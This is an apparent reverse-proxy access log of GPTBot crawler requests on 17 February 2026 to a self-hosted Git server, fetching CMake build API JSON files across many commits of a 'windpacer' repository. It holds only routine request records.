AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13708] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13916] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12463] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12461] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13890] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13607] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12861] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13532] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13535] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12781] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13917] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13535] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12618] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 